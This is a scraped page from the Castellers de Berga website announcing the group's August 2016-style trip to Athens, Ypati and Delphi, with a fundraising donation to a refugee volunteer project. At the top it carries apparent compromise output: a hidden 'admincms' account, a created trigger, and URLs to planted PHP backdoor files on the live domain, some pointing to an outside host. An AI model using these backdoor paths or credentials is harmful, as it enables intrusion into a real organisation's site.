Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?cron https://castellersdeberga.cat/wp-admin/link-meta-meta-private-ajax.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-wp-automatic-updater-cron-stream-cron.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-custom-image-header-core-private.php https://castellersdeberga.cat/wp-content/plugins/revslider/index-core-meta-wp-ajax-response-core-ajax-response-stream.php https://castellersdeberga.cat/wp-content/plugins/woo-redsys-gateway-light/woocommerce-redsys-stream-meta-core-ajax-meta-ajax-response-cron-private-ajax-core.php https://castellersdeberga.cat/wp-includes/SimplePie/Enclosure-meta-meta-meta-ajax.php https://castellersdeberga.cat/wp-includes/ID3/module.audio.ac3-wp-ajax-cron-private-cron-stream-core.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Viatge a Ypati
 

Viatge a Ypati


Viatge a YpatiDel dijous 11 al dilluns 15 d’agost, els Castellers de Berga viatgem a Grècia. Al viatge, estarem acompanyats pels Castellers del Poble Sec.
Dijous 11 d’agost, a les 12:30h, 80 berguedans actuarem a Atenes, a la Plaça Monastiraki. Després de visitar l’Acròpolis i el Museu Arqueològic, ens dirigim cap a Ypati, antiga Neopàtria, a uns 200km al nord-oest. A Ypati, d’uns 4500 habitants, hi dormim cada dia, convidats i acollits per l’Associació Cultural Anianes. 
Divendres 12 d’agost, fem una actuació a Ypati.
Dissabte 13 d’agost, visitem Delfos i Àmfissa.
Diumenge 14 d’agost, fem una sortida al camp de refugiats de Termòpiles.
Dilluns 15, retorna el gruix de l’expedició cap a Berga.
Els Castellers de Berga hem fet diverses activitats per preparar el viatge a Grècia. En aquestes activitats, hem recollit uns 1000 €. La colla ha decidit destinar aquests diners al projecte de voluntariat d’Eko (camp de Vasilika), entre 3 projectes proposats.